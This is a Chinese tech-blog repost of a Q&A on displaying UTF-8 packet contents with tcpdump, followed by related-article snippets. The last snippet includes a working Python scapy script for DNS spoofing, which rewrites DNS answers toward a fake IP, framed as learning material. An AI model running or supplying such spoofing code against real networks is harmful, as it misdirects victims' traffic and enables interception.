以UTF-8嗅探和显示TCP数据包

最新推荐文章于 2024-08-06 20:53:37 发布

转载最新推荐文章于 2024-08-06 20:53:37 发布 · 1.2k 阅读

本文探讨了如何使用tcpdump工具正确显示网络上流动的tcp数据包中的UTF-8文本内容。通过调整终端设置和使用特定的命令行参数，如-A选项结合tr或strings命令，以及iconv工具，可以实现对UTF-8编码的正确解析和显示。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

我正在尝试使用tcpdump来显示在我的网络上流动的tcp数据包的内容.
我有类似的东西：

tcpdump -i wlan0 -l -A

-A选项将内容显示为ASCII文本,但我的文本似乎是UTF-8.有没有办法使用tcpdump正确显示UTF-8？你知道其他任何有用的工具吗？

非常感谢

最佳答案

确保您的终端支持输出UTF-8并将输出管道输出到替换不可打印字符的内容：

tcpdump -lnpi lo tcp port 80 -s 16000 -w - | tr -t '[^[:print:]]' ''
tcpdump -lnpi lo tcp port 80 -s 16000 -w - | strings -e S -n 1

如果您的终端不支持UTF-8,您必须将输出转换为支持的编码.例如.：

tcpdump -lnpi lo tcp port 80 -s 16000 -w - | tr -t '[^[:print:]]' '' | iconv -c -f utf-8 -t cp1251

-c选项告诉iconv省略在目标编码中没有有效表示的字符.

如何在Windows中钩住TCP堆栈来嗅探和修改数据包？
python - Scapy数据包嗅探器触发每个嗅探数据包的动作
网络 - 可以对环回流量进行数据包嗅探吗？
数据包捕获 - 可以对3G网络进行数据包嗅探/分析吗？
拦截HTTPS数据包的数据包嗅探器可以看到哪些信息？
Python数据包嗅探/数据包捕获 - pcapy不捕获数据包
php - PDO MySQL UTF-8：从数据库中读取的数据显示不正确
Windows数据包嗅探器

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

追逐续

关注关注

1
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

爬虫教程（ 1 ） --- 初级、基础、实践

墨鱼菜鸡

07-11

3510

爬虫教程：https://piaosanlang.gitbooks.io/spiders/content/ 如何入门 Python 爬虫：https://zhuanlan.zhihu.com/p/21479334 静觅崔庆才的个人博客 Python 爬虫系列：http://cuiqingcai.com/category/technique/pyth...

实践三网络嗅探与协议分析

weixin_45930204的博客

03-29

8458

20212806 2021-2022-2 《网络攻防实践》第3周作业1.实验内容（知识总结）2.实验过程3.学习中遇到的问题及解决4.学习总结参考资料 1.实验内容（知识总结）网络嗅探（1）定义网络嗅探是一种黑客常用的窃听技术，利用计算机的网络接口截获目的地为其他计算机的数据报文，以监听数据流中所包含的用户账户密码或私密信息等。 (2)网络嗅探器

参与评论您还未登录，请先登录后发表或查看评论

TCP_Client-D2010-SendBuf方式发送utf8编码字符串

11-08

TCP_Client-D2010-SendBuf方式发送utf8编码字符串(较简洁)-2019-8-4-1845.rar, TCP_Client-D2010-SendText方式发送utf8编码字符串-2019-8-4-1815.zip

delphi tcp utf8_Delphi 的 Utf-8 转换

weixin_39927158的博客

12-21

791

新版的 Delphi 應該不用這麼麻煩, 據說只要直接在 AnsiString, WideString, UTF8String 之間 assign 時就會自動幫你做轉換 (沒用過, 不知道是不是真的這樣就可以).不過... 還在用 Delphi 3/5, 所以... 只好自己來轉:unit util_utf8;interfaceuses Windows;typeUTF8String = AnsiS...

TCP网络传输中文乱码（GBK转化为UTF8格式）

weixin_44747201的博客

12-05

1936

GBK转化为UTF8格式

python字符串（Unicode和UTF-8）TCP传输信息的编码方式

yunddun的博客

02-24

2124

esp32开发板和手机建立TCP通讯时，发送的信息有以下不同编码方式比如我要发送数字1 和 2 不管是Unicode还是UTF-8编码，发送到板子，经过解码出来的1或者2 都是字符串的形式（比如：我要判断我要发送的是1还是2，需要用if判断接收到的信息解码后是否==‘1’或者‘2’字符串）如图解码与编码：假设：我以UTF-8编码方式发送1，如果直接把data打印出来，那么发送1，data就是 b’1’, 2就是b’2’ 发送中文：怎， data就是一堆乱七八糟的数字如：b’\x

TCP&UDP;调试工具(ZLG)

03-30

周立功开发的网络调试助手，TCP&UDP;调试助手，亲测可用

justniffer：Justniffer只是一个网络TCP数据包嗅探器。Justniffer是一种网络协议分析器，可以捕获网络流量并以自定义方式生成日志，可以模拟Apache Web服务器日志文件，跟踪响应时间并从HTTP流量中提取所有“被拦截”的文件。

01-30

网络TCP数据包嗅探器 Justniffer是一种网络协议分析器，可以捕获网络流量并以自定义方式生成日志，可以模拟Apache Web服务器日志文件，跟踪响应时间并从HTTP流量中提取所有“被拦截”的文件。例子示例1.以access_...

Unity游戏开发TCP问题

weixin_36277593的博客

08-06

2238

长连接短连接粘包和拆包问题延迟和延迟抖动资源消耗 Nagle算法跨平台兼容性

tcp client sender

02-17

这通常涉及字符串编码（如UTF-8），并可能需要根据协议要求添加额外的头部信息。 3. **发送数据**：利用`send()`或`write()`函数向已建立的连接发送数据。需要注意的是，由于TCP是流式协议，不保证一次性发送完整...

tcp报文发送工具

07-26

tcp报文发送工具，史上最好用最小巧的tcp工具，新测，socket收发用起来一级棒

python如何实时获取tcpdump输出

12-16

一、背景　　今天有个小需求，要确认客户端有没有往服务端发送udp包，但为了减轻工作量，不想每次到机器上手动执行tcpdump抓包命令。　　于是就写了个脚本来释放人力。二、代码实现　　整个脚本我还加了一些其他功能：时间戳、发送端IP提取，数据包分析，数据持久化等。这里都先去掉，仅记录下简单的实时获取tcpdump输出功能。　　代码如下： # -*- coding: utf-8 -*- # !/usr/bin/env python # sudo tcpdump -tt -l -nn -c 5 -i enp4s0 udp port 514 or 51414 import subpro

TCP通信调试工具

08-07

可以辅助网络编程测试，通过软件可以创建多个TCP客户端与服务器端和多个UDP客户端与服务器。

tcpdump的使用

baixiaoshi的专栏

07-26

468

tcpdump -c 10//指定抓取多少个包 tcpdump -w path 写入一个文件 tcpdump -r path 读取一个保存的tcpdump转包文件 tcpdump -i eth0//指定抓取网卡 tcpdump -vvv加的v越多信息越详细

linux下tcpdump的使用

知识就是生产力

04-27

1482

简介用简单的话来定义tcpdump，就是：dump the traffic on a network，根据使用者的定义对网络上的数据包进行截获的包分析工具。 tcpdump可以将网络中传送的数据包的“头”完全截获下来提供分析。它支持针对网络层、协议、主机、网络或端口的过滤，并提供and、or、not等逻辑语句来帮助你去掉无用的信息。实用命令实例默认启动tcpdump 普通情况下，直接启动t

通过tcpdump分析TCP报文（1）

最新发布

03-23

### 网络嗅探与 Spoof 技术概述网络嗅探（Network Sniffing）是一种捕获和分析网络流量的技术，通常用于监控、调试以及恶意活动检测。Spoof 技术则指伪装成合法设备或服务的行为，常见的有 ARP 欺骗、DNS 欺骗等。 #### 网络嗅探的实现原理网络嗅探的核心在于监听局域网内的数据包传输。大多数现代网络采用交换机作为核心设备，默认情况下只会将特定的数据帧发送到目标主机。然而，在某些配置下，可以通过设置网络接口卡（NIC）为混杂模式（Promiscuous Mode），从而接收所有经过该链路的数据帧[^1]。这种技术广泛应用于网络安全审计和渗透测试中。 #### DNS Spoof 的实现机制 DNS Spoof 主要利用了 DNS 协议本身缺乏强验证的特点。攻击者通过工具如 `dnsspoof` 可以拦截正常的 DNS 查询请求，并返回虚假的结果给客户端，使后者访问错误甚至有害的目标地址[^4]。具体来说，当受害者发起一次域名解析时，如果被中间节点篡改，则可能收到伪造 IP 地址而非真实服务器位置的信息。 #### 常见工具介绍及其应用场景 - **Firewalk**: 这是一款基于 ICMP 和 TCP/IP 协议栈行为特征探测远程防火墙规则集的强大工具。它可以发现哪些端口开放或者关闭状态下的回应情况，进而推测出潜在的安全策略布局[^3]。 - **Hping2/3**: Hping 是一款命令行式的TCP/IP报文生成器兼分析仪，支持多种协议类型的自定义构建，比如ICMP, UDP, RAW-IP等等。其中关于路径追踪的功能部分能够完成类似于 Firewalk 执行的任务——即确定沿途各跳点如何处理输入流经它们的数据单元。 - **Dnsspoof**: 正如前面提到过的那样，这是一个专门用来实施 DNS 缓存投毒实验的小型脚本库集合体；允许使用者快速搭建起一套简易版但功能齐全的欺骗环境来进行学习研究用途。以下是使用 Python 实现的一个简单的 DNS Spoof 脚本示例： ```python from scapy.all import * def process_packet(packet): if packet.haslayer(DNSRR): # Check for DNS Resource Record (response) try: requested_name = packet[DNSQR].qname.decode('utf-8') if 'example.com' in requested_name: # Replace with your target domain packet[DNS].an = DNSRR(rrname=requested_name, rdata='192.168.1.100') # Fake IP address del packet[IP].len del packet[IP].chksum del packet[UDP].len del packet[UDP].chksum sendp(Ether(dst=packet[Ether].src)/packet[IP], iface="eth0") # Send the modified response back to victim machine on eth0 interface. except IndexError as e: pass sniff(filter="udp port 53", prn=process_packet) # Capture all packets destined towards standard dns service ports and apply our custom function over them one by one sequentially without any delay between iterations whatsoever! ``` 此代码片段展示了如何截取并修改指定条件下的 DNS 应答消息内容，最终达到误导查询者的目地。